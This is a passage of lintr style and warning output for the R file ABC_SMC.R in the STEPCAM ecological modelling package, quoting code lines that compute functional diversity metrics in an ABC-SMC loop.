^~~~~~~~\n```\n[R/ABC_SMC.R:171:73:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​        params <- getFromPrevious(indices, weights, dispVals, filtVals, compVals);\n                                                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:172:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L172) *warning:* **no visible global function definition for ‘perturb’**\n```r\n​        params <- perturb(params, sigma);\n                  ^~~~~~~\n```\n[R/ABC_SMC.R:179:11:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L179) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(sum(params) > species_fallout)\n          ^\n```\n[R/ABC_SMC.R:180:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L180) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        {\n        ^\n```\n[R/ABC_SMC.R:183:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L183) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\td <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\", collapse = NULL), header = F);\n^\n```\n[R/ABC_SMC.R:186:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L186) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\td <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\", collapse = NULL), header = F);\n^~\n```\n[R/ABC_SMC.R:187:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L187) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t} else {\n^\n```\n[R/ABC_SMC.R:188:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L188) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\td <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL), header = F);\n^~\n```\n[R/ABC_SMC.R:189:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L189) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/ABC_SMC.R:192:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L192) *style:* **lines should not be more than 80 characters.**\n```r\n​      # and community ((66 * permutations * communities) x total species richness) matrices\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:193:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L193) *style:* **lines should not be more than 80 characters.**\n```r\n​      traits <- as.data.frame(species[, c(2:(n_traits + 1))], row.names = c(1:taxa));\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:196:62:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L196) *style:* **Put spaces around all infix operators.**\n```r\n​      present_species <- as.vector(which(colSums(communities)>0))\n                                                            ~^~\n```\n[R/ABC_SMC.R:199:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L199) *style:* **lines should not be more than 80 characters.**\n```r\n​     # FD_output <- dbFD(traits[present_species, ], communities[, present_species], stand.x = F,messages=FALSE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:199:8:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L199) *style:* **Commented code should be removed.**\n```r\n​     # FD_output <- dbFD(traits[present_species, ], communities[, present_species], stand.x = F,messages=FALSE)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L200) *style:* **Variable and function names should be all lowercase.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species]);\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L200) *warning:* **no visible global function definition for ‘strippedDbFd’**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species]);\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:200:51:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L200) *style:* **Commas should always have a space after.**\n```r\n​      FD_output <- strippedDbFd(Ord, communities[,present_species]);\n                                                  ^\n```\n[R/ABC_SMC.R:201:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L201) *style:* **lines should not be more than 80 characters.**\n```r\n​      FRic <- FD_output$FRic # FRic = functional richness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:202:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L202) *style:* **lines should not be more than 80 characters.**\n```r\n​      FEve <- FD_output$FEve # FEve = functional evenness (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L203) *style:* **lines should not be more than 80 characters.**\n```r\n​      FDiv <- FD_output$FDiv # FDiv = functional diversity (Villeger et al, 2008, Ecology)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:206:10:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L206) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(i in 1:n_traits){\n         ^\n```\n[R/ABC_SMC.R:212:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L212) *style:* **lines should not be more than 80 characters.**\n```r\n​      # calculate distance of trait mean simulated community from that of observed\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L215) *style:* **lines should not be more than 80 characters.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean values of\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:1:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L217) *style:* **lines should not be more than 80 characters.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals);\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:14:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals);\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:14:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L217) *warning:* **no visible global function definition for ‘calculateDistance’**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]], mean_optimum[1], summary_stats, sd_vals);\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L220) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(fit < threshold)\n        ^\n```\n[R/ABC_SMC.R:221:7:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L221) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​      {\n      ^\n```\n[R/ABC_SMC.R:222:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:27:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] = params[1];\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:223:18:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextDisp[numberAccepted] = params[1];\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:34:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L223) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextDisp[numberAccepted] = params[1];\n                                 ^\n```\n[R/ABC_SMC.R:224:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] = params[2];\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:224:18:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] = params[2];\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:224:34:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L224) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextFilt[numberAccepted] = params[2];\n                                 ^\n```\n[R/ABC_SMC.R:225:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] = params[3];\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:225:18:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] = params[3];\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:34:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L225) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextComp[numberAccepted] = params[3];\n                                 ^\n```\n[R/ABC_SMC.R:227:14:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] = fit;\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:30:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L227) *style:* **Use <-, not =, for assignment.**\n```r\n​        fits[numberAccepted] = fit;\n                             ^\n```\n[R/ABC_SMC.R:228:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]];\n        ^~~~~~~\n```\n[R/ABC_SMC.R:228:17:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L228) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]];\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:228:33:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L228) *style:* **Use <-, not =, for assignment.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]];\n                                ^\n```\n[R/ABC_SMC.R:229:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]];\n        ^~~~~~\n```\n[R/ABC_SMC.R:229:16:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L229) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]];\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:229:32:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L229) *style:* **Use <-, not =, for assignment.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]];\n                               ^\n```\n[R/ABC_SMC.R:230:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L230) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]];\n        ^~~~~~\n```\n[R/ABC_SMC.R:230:16:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L230) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]];\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:230:32:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L230) *style:* **Use <-, not =, for assignment.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]];\n                               ^\n```\n[R/ABC_SMC.R:231:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:231:16:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L231) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:32:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L231) *style:* **Use <-, not =, for assignment.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n                               ^\n```\n[R/ABC_SMC.R:233:11:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L233) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(t == 1) {nextWeights[numberAccepted] = 1}\n          ^\n```\n[R/ABC_SMC.R:233:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L233) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        if(t == 1) {nextWeights[numberAccepted] = 1}\n                   ^\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if(t == 1) {nextWeights[numberAccepted] = 1}\n                    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:33:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if(t == 1) {nextWeights[numberAccepted] = 1}\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:49:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L233) *style:* **Use <-, not =, for assignment.**\n```r\n​        if(t == 1) {nextWeights[numberAccepted] = 1}\n                                                ^\n```\n[R/ABC_SMC.R:233:52:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L233) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​        if(t == 1) {nextWeights[numberAccepted] = 1}\n                                                   ^\n```\n[R/ABC_SMC.R:235:11:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = calculateWeight(params, changed, sigma,\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:23:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = calculateWeight(params, changed, sigma,\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:39:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L235) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = calculateWeight(params, changed, sigma,\n                                      ^\n```\n[R/ABC_SMC.R:235:41:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = calculateWeight(params, changed, sigma,\n                                        ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:236:11:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​          dispVals, filtVals, compVals, numParticles, weights);\n          ^~~~~~~~\n```\n[R/ABC_SMC.R:236:21:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​          dispVals, filtVals, compVals, numParticles, weights);\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:236:31:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​          dispVals, filtVals, compVals, numParticles, weights);\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:236:41:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L236) *style:* **Variable and function names should be all lowercase.**\n```r\n​          dispVals, filtVals, compVals, numParticles, weights);\n                                        ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:239:18:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L239) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n                 ^\n```\n[R/ABC_SMC.R:239:19:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L239) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n                  ^\n```\n[R/ABC_SMC.R:239:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n                   ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:239:35:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L239) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n                                 ~^~~\n```\n[R/ABC_SMC.R:239:37:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L239) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n                                    ^\n```\n[R/ABC_SMC.R:239:38:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L239) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n                                     ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:239:51:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L239) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0)\n                                                 ~^~\n```\n[R/ABC_SMC.R:240:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L240) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        {\n        ^\n```\n[R/ABC_SMC.R:246:9:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L246) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      if(tried > (1/stopRate) && tried > 5)\n        ^\n```\n[R/ABC_SMC.R:246:20:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L246) *style:* **Put spaces around all infix operators.**\n```r\n​      if(tried > (1/stopRate) && tried > 5)\n                  ~^~\n```\n[R/ABC_SMC.R:246:21:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L246) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if(tried > (1/stopRate) && tried > 5)\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:7:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L247) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​      {\n      ^\n```\n[R/ABC_SMC.R:249:11:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L249) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(numberAccepted / tried < stopRate) {stop_iteration <- 1; break;}\n          ^\n```\n[R/ABC_SMC.R:249:12:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if(numberAccepted / tried < stopRate) {stop_iteration <- 1; break;}\n           ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:249:37:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L249) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if(numberAccepted / tried < stopRate) {stop_iteration <- 1; break;}\n                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:249:47:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L249) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​        if(numberAccepted / tried < stopRate) {stop_iteration <- 1; break;}\n                                              ^\n```\n[R/ABC_SMC.R:249:75:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L249) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​        if(numberAccepted / tried < stopRate) {stop_iteration <- 1; break;}\n                                                                          ^\n```\n[R/ABC_SMC.R:254:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L254) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp;\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:254:17:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L254) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp;\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:255:5:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt;\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:255:17:](https://github.com/thijsjanzen/STEPCAM/blob/48fd9e0b428ff53c5440d39a9ac2fb0d11bd7b3b/R/ABC_SMC.R#L255) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt;\n                